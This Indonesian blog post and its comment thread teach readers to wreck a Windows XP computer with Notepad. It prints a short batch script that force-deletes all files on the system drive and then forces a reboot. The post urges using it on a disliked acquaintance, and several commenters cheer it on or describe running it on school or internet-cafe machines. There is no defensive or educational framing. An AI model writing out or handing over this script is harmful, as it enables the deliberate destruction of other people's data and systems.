Pasang iklan Anda di sini.
http://goo.gl/ad3AU2
> > Cara Merusak System Windows XP dengan Notepad

23 Cara Merusak System Windows XP dengan Notepad

Senin, Mei 20, 2013
Cara Merusak Windows XP dengan Notepad | Cirebon-Cyber4rt - Pada hari jum'at yang berbahagia ini saya akan share sebuah trick jail atau bisa dibilang jahat karena trick ini sifatnya merusak dan merugikan orang lain.

Cara Merusak System Windows XP dengan Notepad
Microsoft Windows XP

Apabila kalian punya teman atau kenalan yang kurang kalian sukai, mungkin karena dia suka pinjem duit ke kalian, suka telat bayar utang dll :p coba kalian pake cara ini buat ngerjain tuh si doi ( kalo dia punya PC ya... ) hehehee.

Trick ini sebenarnya sangatlah simple, kalian cukup menggunakan notepad dan imajinasi kalian. Berikut cara merusak system windows xp dengan notepad.

Tutorial :
1). Buka notepad lalu copy-paste script dibawah ini :

@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00

2). Simpan dengan extensi .bat

Cara menggunakannya cukup dengan Double-click pada file yang sudah kalian buat tadi, dan jangan heran kalo komputer/laptop kalian akan mati dan saya juga kurang tau bagaimana cara mengatasi windows xp yang sudah dirusak oleh notepad ber-script ini :p

Saya tidak bertanggung jawab apabila terjadi kerusakan pada komputer atau laptop!

Jalan terakhir untuk mengembalikan komputer/laptop yang mati ini mungkin adalah Install ulang =)) Jadi kalian pikirin baik-baik untuk tidak mencobanya di Komputer atau Laptop pribadi.

Sekian postingan saya kali ini yang membahas tentang Cara Merusak System Windows XP dengan Notepad, semoga dapat bermanfaat.




Artikel Terkait :

23 komentar:

Tips Trik Komputer mengatakan...

Scriptnya cukup simple,
tapi bisa menghancurkan OS, mantap nih. Kalau utk wind-7 gimana gan? soalnya sudah tdk ada lagi yg pakai wind- xp...

Cah Gembloengz mengatakan...

wahh,,sesat,hahahay..
jangan di coba di pc sendiri,,buat praktek di warnet aja,,hahahay..

Yansen Haryanto mengatakan...

ane malah coba di komputer sekolah diem-diem langsung pelajaran komputer gk di ruang komputer tetapi di ruang kelas akrna semua komputernya lagi di inul

Tribulus mengatakan...

Informasinya bermanfaat banget mas, makasih banyak ya ??

mozardd mengatakan...

kk tolong bisa buat cit modoo marble ngak???? jangan cit dual login tapi cit dadu Hack makasih kk saya tunggu

Abed Saragih mengatakan...

Kalau yang pakai Xp gawat juga ini kodenya Mas,bisa berabe juga ini win xp dibuatnya.

Jogja Glory mengatakan...

Ilmunya mantap deh mas! :D

Hendra Hacc mengatakan...

Yg masih pake XP buruan upgrade deh. Hehe..

Mas ipul mengatakan...

hahahahah, untung ane pake


Kunjungan Malam Sobat, Kunjungan Balik nya Saya Tunggu ya... :D7

Jakarta-Cyber4art mengatakan...

izin nyoba ya,caranya mudah banget,izin nyimak and coba D hehehhe

Rahmat mengatakan...

buat ngerusak komputer di warnet

Nur Ace MAxs mengatakan...

mantap nih

Dwi Yulianto mengatakan...

mending kalau posting yang ada solusinya om,,,, :D
ini ada solusinya mungkin pakai CD Instalan WIndows :v

cepi mengatakan...

mkasih sob buat infonya

obat peninggi badan mengatakan...

makasih atas infonya

Vacum Pembesar Payudara mengatakan...

sangat menarik sob infonya.tq

Anonim mengatakan...

Langsung otomatis kedelete ma Kaspersky.. Trojan katanya.. :v

Anonim mengatakan...

mantaf ente

Anonim mengatakan...

maaf sebelumnya untuk admin cirebon-cyber4rt.saya di sini hanya menyarankan anda untuk menghapus iklan2 yang ada di blog anda yang di peruntukkan orang dewasa.karena blog anda ini tidak hanya di kunjungi oleh orang2 dewasa tetapi juga ada anak2 yang masih di bawah umur mengunjungi blog anda.tolong untuk di pertimbangkan.terima kasih

Anonim mengatakan...

hahaha script penghapus system yg ujung"a minta inul trus sama shutdown komputer dengan waktu 0 detik ....

Anonim mengatakan...

kalo ngeshare mending yg ada sholusinya bray... sejak SMP kelas 2 ane udah kenal sama script kyak begituan. tpi gk ada sholusinya, itu namanya bukan ngejail. tpi merugikan orang lain.

Inbox Mp3 Online mengatakan...

Berbahaya kalau gk mau instal ulang :P
Citra Indah dan Citra Gran

Rama Dony mengatakan...

wah,, keren jg nih,, script pendek,,
akibattt panjanggggggggggggggggg bgt,, !!!

lumayan baut koleksi ane,,
ehehe :)

Poskan Komentar

Contact

Nama

Email *

Pesan *